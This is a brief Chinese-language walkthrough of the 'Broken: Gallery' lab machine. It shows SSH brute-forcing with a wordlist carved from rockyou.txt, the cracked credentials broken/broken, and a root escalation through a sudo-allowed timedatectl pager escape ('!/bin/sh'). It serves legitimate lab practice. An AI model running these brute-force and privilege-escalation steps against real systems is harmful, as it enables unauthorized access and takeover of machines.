Broken: Gallery¶ 知识整理 ssh爆破 sudo提权 usershell¶ 目标IP:192.168.205.146 服务信息: 22/tcp open ssh 80/tcp open http web服务只是单纯的前端页面,什么都没有,只剩爆破ssh一条路可以走了 cat ~/wordlists/rockyou.txt|grep broken > dic.txt 拆分一个小字典出来,爆破ssh [22][ssh] host: 192.168.205.146 login: broken password: broken 登录ssh拿到user权限 rootshell¶ sudo -l (ALL) NOPASSWD: /usr/bin/timedatectl 可以提权 sudo timedatectl list-timezones !/bin/sh